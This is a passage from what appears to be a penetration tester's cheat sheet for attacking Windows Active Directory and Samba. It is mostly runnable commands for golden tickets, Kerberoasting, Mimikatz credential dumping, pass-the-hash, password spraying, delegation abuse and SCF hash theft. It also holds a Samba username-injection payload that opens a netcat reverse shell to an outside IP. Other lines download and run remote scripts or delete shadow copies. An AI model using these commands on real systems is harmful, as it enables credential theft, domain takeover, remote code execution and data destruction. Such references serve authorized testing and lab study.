impacket-lookupsid [domain/]username[:password]@]<IP>

## ------------------| Extract Krbtgt hash
impacket-secretsdump [domain/]username[:password]@]<IP> -outputfile krb -user-status
impacket-secretsdump [domain/]username[:password]@]<IP> -outputfile krb -user-status -just-dc-user krbtgt -just-dc-ntlm

## ------------------| Generate the TGT 
## [NTLM Hash]
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
## [AES Key]
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

## ------------------| Convert kirbi,ccache
impacket-ticketConverter ticket.kirbi /tmp/ticket.ccache
impacket-ticketConverter ticket.ccache /tmp/ticket.kirbi

## ------------------| Set the ticket for impacket use
export KRB5CCNAME=/tmp/ticket.[ccache/kirbi]
klist

## ------------------| Execute remote commands with any of the following by using the TGT
## !! Remember do not use IP address. always use hostname.domain
python psexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass
impacket-psexec <domain_name>/<user_name>@<remote_hostname.domain> -k -no-pass

## ------------------| Fix errors
## KRB_AP_ERR_SKEW(Clock skew too great) --> sudo ntpdate <DCIP>

• With Mimikatz

## ------------------| Pass the Ticket [/ppt]
## If you use /ptt at the end of the command when generate the ticket, 
## Then you can use misc::cmd command and then use psexec.exe to get cmd shell.

## ------------------| Generate the ticket
## If you do not use /ppt at the end of the command when you generate the ticket,
## It will store the ticket as ticket.kirbi file. 
## This TGT ticketis valid for 10 years 

## ------------------| RID
## You can use /id:500 to geneate admin ticket

## ------------------| To generate the TGT
## [NTLM Hash]
kerberos::golden /user:h4rithd /domain:<domain_name> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt
kerberos::golden /user:h4rithd /domain:<domain_name> /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
## [AES 128 key]
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /ptt
## [AES 256 key] ** more secure encryption, probably more stealth due is the used by default by Microsoft.
kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /ptt

## ------------------| Inject TGT with Mimikatz
kerberos::ptt <ticket_kirbi_file>
misc::cmd

## ------------------| Inject TGT with Rubeus
Rubeus.exe ptt /ticket:<ticket_kirbi_file>

## ------------------| Get shell
misc::cmd
psexec.exe \\<DC_HostName> cmd.exe
pushd \\<DC_HostName>\C$

• With Metasploit

## ------------------| Enumerate krbtgt hash & SID of the domain controller
load kiwi
dcsync_ntlm krbtgt

## ------------------| Colloect other information
shell
ipconfig /all 
nbstat -a <DNS_SERVERS_IP>

## ------------------| Create ticket
golden_ticket_create -d <DOMAIN> -u <USER> -s <DOMAIN-SID> -k <HASH> -t /tmp/ticket.kirbi

19. Kerberoasting

• With GetUserSPNs.ps1

## ------------------| List all SPNs
cp /usr/share/kerberoast/GetUserSPNs.ps1 .
IEX (New-Object Net.WebClient).DownloadString('http://<IP>/GetUserSPNs.ps1')
## With PowerView
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl

## ------------------| Request ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <ServicePrincipalNames>        
## Then ticket will store on memory; 

## ------------------| Use mimikatz to save ticket to disk
kerberos::list /export

## ------------------| Crack hash
sudo apt-get install kerberoast
python3 /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

## ------------------| If you are willing to crack with john
git clone https://github.com/nidem/kerberoast
python3 kerberoast/kirbi2john.py ticket.kirbi > john-ticket.txt
john --format=krb5tgs john-ticket.txt -wordlist=/usr/share/wordlists/rockyou.txt

• With Invoke-Kerberoast.ps1

## ------------------| Download
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1            

## ------------------| Export ticket
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Format Hashcat | Select-Object Hash | ConvertTo-Csv -NoTypeInformation | Out-File hashes.csv             

## ------------------| Crack hash
hashcat -m 13100 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O

• With Rubeus

## ------------------| Export ticket
.\Rubeus.exe kerberoast /simple /outfile:hashes.txt
.\Rubeus.exe kerberoast /creduser:<Domain>\<UserName> /credpassword:Password123! /outfile:hashes.txt

## ------------------| Crack hash
hashcat -m 13100 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O

20. Mimikatz

• Dump all user's ntlm hashes.

.\mimikatz.exe "token::elevate" "lsadump::sam" "exit" >> mimikatz-sam.out
.\mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "exit" >> mimikatz-lsa.out

• Dump passwords using lsass

## ------------------| Using Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> mimikatz-lsass.out       

## ------------------| If you have lsass as Mini DuMP or Rekall
pip3 install pypykatz
pypykatz lsa minidump lsass.DMP --json

• Export Kerberos tickets.

kerberos::list /export

• Extract krbtgt Hash

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit" >> mimikatz-krbtgt.out       
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<DOMAIN> /user:krbtgt" "exit" >> mimikatz-krbtgt2.out        

• OverPassTheHash

## ------------------| Login as another user
privilege::debug
sekurlsa::pth /user:[USER] /domain:[DOMAIN] /ntlm:[NTLM HASH] /run:"powershell -EncodedCommand SQBF..DFSS=="      

## ------------------| Login to Domain Controller machine
net use \\<DC>
.\PsExec.exe -accepteula \\<DC> cmd.exe 

• Set password for account

.\mimikatz.exe "lsadump::setntlm /user:USERNAME /ntlm:NTLMHASH" "exit"

• Most Popular Mimikatz Commands [source : adsecurity.org]

CRYPTO::Certificates    # list/export certificates
KERBEROS::Golden        # create golden/silver/trust tickets
KERBEROS::List          # List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.
KERBEROS::PTT           # pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync         # ask a DC to synchronize an object (get password data for account). No need to run code on DC.
LSADUMP::LSA            # Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
LSADUMP::SAM            # get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
LSADUMP::Trust          # Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
MISC::AddSid            # Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
MISC::MemSSP            # Inject a malicious Windows SSP to log locally authenticated credentials.
MISC::Skeleton          # Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
PRIVILEGE::Debug        # get debug rights (this or Local System rights is required for many Mimikatz commands).
SEKURLSA::Ekeys         # list Kerberos encryption keys
SEKURLSA::Kerberos      # List Kerberos credentials for all authenticated users (including services and computer account)
SEKURLSA::Krbtgt        # get Domain Kerberos service account (KRBTGT)password data
SEKURLSA::LogonPasswords #lists all available provider credentials. This usually shows recently logged on user and computer credentials.
SEKURLSA::Pth           # Pass- theHash and Over-Pass-the-Hash
SEKURLSA::Tickets       # Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
TOKEN::List             # list all tokens of the system
TOKEN::Elevate          # impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate /domainadmin # impersonate a token with Domain Admin credentials.

21. Pass The Hash [PTH] - extended

## ------------------| impacket-psexec
impacket-psexec <USER>@<IP> -hashes <NTML>:<NTML>   

## ------------------| pth-winexe
export SMBHASH=<NTML>:<NTML>
pth-winexe -U administrator //192.168.1.101 cmd
pth-winexe -U administrator/<NTML>:<NTML> //192.168.0.101 cmd

## ------------------| Metasploit
use exploit/windows/smb/psexec
set SMBPass <NTML>:<NTML>

## ------------------| wmiexec.py
wmiexec.py –hashes <NTML>:<NTML> <DOMAIN>/<USER> @CORPDC01 "vssadmin delete shadows /all /quiet" > out.txt

## ------------------| PsExec.exe
PsExec.exe -accepteula \\<HOST> -u <DOMAIN>\<USER> -p <NTML>:<NTML> cmd.exe
PsExec.exe -accepteula \\<HOST> -s -u <DOMAIN>\<USER> -p <NTML>:<NTML> cmd.exe

## ------------------| Mimikatz
Mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USER> /ntlm:<NTML> /domain:<DOMAIN>" "exit"                       

## ------------------| xfreerdp 
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<NTML>:<NTML> /v:<IP>

22. Powermad.ps1

## ------------------| Add fake machine
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Import-Module Powermad.ps1
New-MachineAccount -MachineAccount <FakeComputerName> -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

23. Password Spraying

• Low and Slow Password Spraying

wget https://raw.githubusercontent.com/ZilentJack/Spray-Passwords/master/Spray-Passwords.ps1          
.\Spray-Passwords.ps1 -Pass Password123! -Admin

• Spray.sh

## ------------------| Setup
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh                                                                                                                                   

## ------------------| SMB Portal  
spray.sh -smb <targetIP> <USERNAMEs.TXT> <PASSWORDS.TXT> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

## ------------------| OWA Portal
spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>

03. Other commands / Exploits

• Unconstrained Delegation + The PrinterBug = DCSync

## ------------------| Reconnaissance
## Upload following files to compromised machine.
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

## ------------------| Exploitation Printer Bug
wget https://raw.githubusercontent.com/h4rithd/PrecompiledBinaries/main/Rubeus/Rubeus.exe
wget https://raw.githubusercontent.com/h4rithd/PrecompiledBinaries/main/SpoolSample/MS-RPRN.exe

./Rubeus.exe monitor /interval:5 /nowrap ## Terminal 01 (shell 01)
./MS-RPRN.exe DC01 DC02 ## Terminal 02 (shell 02) [need nt authority\system]

## DC01 is the domain controller we want to compromise.
## DC02 is the machine with delegation enabled that we control.
tasklist /SVC | findstr Rubeus.exe
taskkill /F /PID <PID>

## ------------------| Get TGT
## [need nt authority\system]
./Rubeus.exe ptt /ticket:doIFyDCCBcSgAw.....sdoIFyDC== 
./Rubeus.exe klist

## ------------------| DCSync 
./mimikatz.exe "lsadump::dcsync" "/user:<USERNAME>\krbtgt" "exit"

• Resource Based Constrained Delegation [Domain Escalation]

## ------------------| Identify the vulnarability
### If you have GenericAll/GenericWrite/Write on a Computer object, you are welcome!!
### Check if the value is 10?
Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select ms-ds-machineaccountquota
### Check if the os is greater than or equal to Windows 2012 
Get-DomainController | select OSVersion

## ------------------| Exploit [PART I]
Import-Module ./Powermad.ps1
### Create new fake computer object inside the domain
New-MachineAccount -MachineAccount FAKEMACHINE -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer FAKEMACHINE
### Using AD PowerShell module, give the new fake computer object the Constrained Delegation privilege.
Set-ADComputer <TargetComputer> -PrincipalsAllowedToDelegateToAccount FAKEMACHINE$
Get-ADComputer <TargetComputer> -Properties PrincipalsAllowedToDelegateToAccount

## ------------------| Exploit [PART II]
### Performing a complete S4U attack
.\Rubeus.exe hash /password:123456 /user:FAKEMACHINE$ /domain:domain.local
### Note-down the aes256_cts_hmac_sha1 hash

## ------------------| Exploit [PART III]
### generate a ccached TGT and used KERB5CCNAME pass the ccahe file for the requested service. 
impacket-getST domain.local/FAKEMACHINE -dc-ip <IP> -impersonate administrator -spn http/victim.domain.local -aesKey <AES_KEY>
export KRB5CCNAME=administrator.ccache
### We must set /etc/hosts file to map the domain name & hostname to the victim’s IP address
impacket-smbexec domain.local/administrator@victim.domain.local -no-pass -k
impacket-psexec domain.local/administrator@victim.domain.local -no-pass -k

• Mount shares to linux machine

## ------------------| Setup
sudo apt-get install cifs-utils
sudo mkdir /mnt/shares
sudo chmod 777 /mnt/shares

## ------------------| Mount shares
sudo mount -t cifs //$IP/Users /mnt/shares
sudo mount -t cifs -o 'username=L.Frost,password=welcome2019' //$IP/Users /mnt/shares                    

## ------------------| Mount Options
-o 'username=L.Frost,password=welcome2019'
-o 'vers=2.0' ## can be change to vers=1.0 and vers=3.0
-o 'dir_mode=0755,file_mode=0755'

## ------------------| Usage of Thunar 
thunar smb://$IP/

• Mounting VHD file on Kali Linux through remote share

apt-get install libguestfs-tools
apt-get install cifs-utils

guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd -v

• SCF File Attacks

## ------------------| Create payload nano stealhash.scf 
[Shell]
Command=2
IconFile=\\<YourP>\share\h4rithd.ico
[Taskbar]
Command=ToggleDesktop

## ------------------| Start responder 
responder -I tun0
# Then copy the scf file to users desktop

• Get Deleted items from AD

Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *    

• If you get STATUS_PASSWORD_MUST_CHANGE ; Reset SMB Password

## ------------------| If you are from linux env
smbpasswd -U <UserName> -r <RemoteMachineIP>

## ------------------| If you are from Windows env (Powershell)
$username = 'phinchley'
$dc = 'dc.lab.hinchley.net'

$old = 'Passw0rd1#'
$new = 'Something!'

$code = @'
[DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
public static extern bool NetUserChangePassword(string domain, string username, string oldpassword, string newpassword);
'@

$NetApi32 = Add-Type -MemberDefinition $code -Name 'NetApi32' -Namespace 'Win32' -PassThru

if ($result = $NetApi32::NetUserChangePassword($dc, $username, $old, $new)) {
  write-host 'Password change failed.'
} else {
  write-host 'Password change successful.'
}

• Knock and Pass: Kerberos Exploitation

• Samba 3.0.20 < 3.0.25rc3 - 'Username' map script (CVE 2007-2447)

crackmapexec smb --shares <IP> -u './=`nohup nc -e /bin/sh 10.10.14.17 4545`' -p ''

• SambaCry | CVE-2017-7494 | 3.5.0 and 3.6.0

## ------------------| Setup
git clone https://github.com/opsxcq/exploit-CVE-2017-7494 && exploit-CVE-2017-7494
sudo pip install virtualenv
virtualenv -p python2 venv
source venv/bin/activate
pip2 install impacket

## ------------------| Expolit
python ./exploit.py -t $IP -e libbindshell-samba.so  -s SusieShare -r /SusieShare/libbindshell-samba.so -u admin -p '' -P 6699